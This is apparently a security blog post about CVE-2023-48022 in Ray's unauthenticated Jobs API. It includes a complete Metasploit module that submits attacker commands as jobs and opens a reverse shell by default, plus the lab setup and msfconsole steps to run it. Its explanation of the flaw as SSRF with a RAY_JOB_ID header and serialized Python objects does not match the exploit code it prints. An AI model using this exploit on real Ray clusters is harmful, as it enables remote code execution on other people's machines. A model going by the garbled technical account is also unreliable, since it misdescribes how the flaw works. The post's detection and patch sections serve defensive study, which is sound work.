Unmasking Ray's Vulnerability: A Deep Dive into CVE-2023-48022

2024-04-21

James McGill

CVE-2023-48022

CVE-2023-48022 PoC

CVE-2023-48022 exploit

Ray vulnerability

Ray security

Ray Jobs API

Ray exploit mitigation

Ray security best practices

secure Ray cluster from SSRF attacks

detecting CVE-2023-48022 in Ray deployments

securing machine learning workloads with Ray

Ray cluster security

Unmasking Ray's Vulnerability: A Deep Dive into CVE-2023-48022

Introduction

The world of distributed computing for machine learning (ML) was rattled in late 2023 by CVE-2023-48022, a critical vulnerability lurking within the popular Ray framework. This vulnerability exposed Ray clusters to a nasty case of Server-Side Request Forgery (SSRF), leaving them vulnerable to remote compromise. For security researchers and system administrators alike, understanding the details of CVE-2023-48022 is crucial to fortifying Ray deployments.

Ray in the Spotlight

Ray, developed by Anyscale, is an open-source framework that empowers developers to seamlessly scale Python applications and ML workloads across clusters. Its ability to handle complex computations with ease has garnered the attention of industry giants like Uber, Amazon, and OpenAI. However, CVE-2023-48022 cast a shadow over Ray's brilliance, highlighting a security flaw that could be exploited by malicious actors.

The Anatomy of the Attack

The vulnerability stemmed from Ray's Jobs API, which, in versions prior to the fix, lacked proper authentication. This gaping hole allowed attackers to forge requests to the API, essentially tricking the Ray cluster into executing arbitrary commands on the underlying system.

The Vulnerability: Missing Authentication in the Jobs API

The crux of CVE-2023-48022 lies in the lack of robust authentication for the Jobs API in Ray versions prior to 2.8.1. This meant an unauthenticated attacker could potentially forge requests to the API and manipulate Ray's behavior.

Here's a technical breakdown of the exploit:

Crafting the Malicious Request: The attacker constructs a specially crafted HTTP request targeting the Jobs API endpoint. This request would typically include a RAY_JOB_ID header and a serialized Python object representing the malicious payload.
Exploiting SSRF: The vulnerability stemmed from Ray's reliance on the requests library to execute tasks specified in the Jobs API. Without proper validation, Ray would blindly attempt to fulfill the attacker's request, even if it involved fetching remote resources (SSRF).
Code Execution and Shenanigans: The attacker could embed malicious code within the serialized Python object submitted through the Jobs API. Once Ray deserialized and executed the object on a worker node, the attacker code would have the privileges of the Ray user running the cluster.

Proof of Concept

First we will need to install a vulnerable version of Ray in a virtual environment to set up a lab for this PoC. We can do this by running:

pip3 install -U "ray[default]"==2.8.0

Once we have the ray installed, we can go ahead and start the server:

ray start --head --dashboard-host=0.0.0.0

We can verify the status of the running Ray server by accessing the default port 8265

We will be using a metasploit module to exploit this vulnerability and get a reverse shell into the target system hosting the vulnerable Ray server.

Copy the following metasploit module into a file, we are naming the file "ray_job_rce.rb"

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ray Agent Job RCE',
      'Description'    => %q{
        RCE in Ray via the agent job submission endpoint. This is intended functionality as
Ray's main purpose is executing arbitrary workloads.
        By default, Ray has no authentication.
      },
      'Author'         => ['sierrabearchell', 'byt3bl33d3r <marcello@protectai.com>', 'Akos Jakab'],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/']
        ],
      'Platform'       => 'linux',
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2023-11-15',
      'DefaultOptions' => {
        'RPORT' => 8265,
        'SSL'   => false,
        'PAYLOAD' => 'linux/x64/shell/reverse_tcp'
      }
    ))
    register_options(
      [
        OptString.new('COMMAND', [false, 'The command to execute', '']),
      ])
  end
  def check
    # Simple check to see if target is reachable; consider enhancing based on app's specific
behavior or endpoints
    res = send_request_cgi('uri' => '/')
    return res.nil? ? CheckCode::Unknown : CheckCode::Detected
  end

  def execute_command(cmd, opts = {})
    target_uri_paths = ['/api/jobs/', '/api/job_agent/jobs/']
    target_uri_paths.each do |uri|
      begin
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => normalize_uri(uri),
          'ctype'  => 'application/json',
          'data'   => {'entrypoint' => cmd}.to_json
        })
        
        unless res
          print_error("Failed to receive response for #{uri}")
          next
        end
        
        if res.code == 200
          print_good("Command execution successful: #{cmd}")
          job_data = res.get_json_document
          print_status("Job ID: #{job_data['job_id']}, Submission ID:
#{job_data['submission_id']}")
          return
        else
          print_error("Failed command execution for #{uri}: HTTP #{res.code}")
        end
      rescue ::Rex::ConnectionError => e
        print_error("Failed to connect to the server: #{e.message}")
        return
      end
    end
    fail_with(Failure::Unknown, "Command execution failed for all paths")
  end

  def exploit
    if datastore['COMMAND'].nil? || datastore['COMMAND'].empty?
      print_status('No custom command specified, executing reverse shell...')
      execute_cmdstager
    else
      print_status("Executing custom command: #{datastore['COMMAND']}")
      execute_command(datastore['COMMAND'])
    end
  end
end

Now copy it in the exploits directory of metasploit:

cp ray_job_rce.rb /usr/share/metasploit-framework/modules/exploits/multi/misc/

Let's launch the metasploit console and reload so it can pick the newly added module:

msfconsole

reload_all

Now load the exploit to perform the attack:

use exploit/multi/misc/ray_job_rce

We need to set up the options required by the module before we launch the exploit. Let's set RHOST (remote host) which is our target server and LHOST (local host) which is our attacker server. The port 8265 would be already set up by default.

set RHOST <TARGET_IP>

set LHOST <LOCAL_IP>

Once we have set up the options, we can finally launch the exploit and see if it is able to give us a reverse shell into the target system:

run

The Patch and the Aftermath

The security community breathed a collective sigh of relief when Anyscale released a fix for CVE-2023-48022 in Ray versions 2.8.1 and above. The patch implemented proper authentication for the Jobs API, effectively closing the backdoor attackers were exploiting.

However, reports emerged in March 2024 suggesting that attackers had been actively exploiting this vulnerability for months, compromising numerous Ray deployments. This emphasizes the importance of staying updated with security patches and maintaining good security hygiene.

Advanced Detection Techniques

While the patch mitigates the vulnerability, security researchers can employ advanced techniques for threat hunting and post-mortem analysis:

Log Analysis: Scrutinize Ray logs for unusual job submissions, particularly those originating from external sources. Look for inconsistencies in job types or resource usage patterns.
Network Traffic Monitoring: Monitor network traffic for suspicious outgoing connections initiated by Ray processes. Identify connections to unexpected remote URLs that could be indicative of SSRF attempts.
Code Analysis: Analyze the Ray codebase, particularly the components handling the Jobs API, to identify potential bypass mechanisms or lingering vulnerabilities.

Conclusion

While CVE-2023-48022 has been patched, it serves as a wake-up call for the security community. By understanding the technical intricacies of this vulnerability, security researchers can develop better detection and mitigation strategies. System administrators, on the other hand, can leverage this knowledge to fortify their Ray deployments and safeguard critical ML workloads. By working together, we can create a more secure environment for distributed computing and ML.

Disclaimer

The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2023-48022 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.

It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.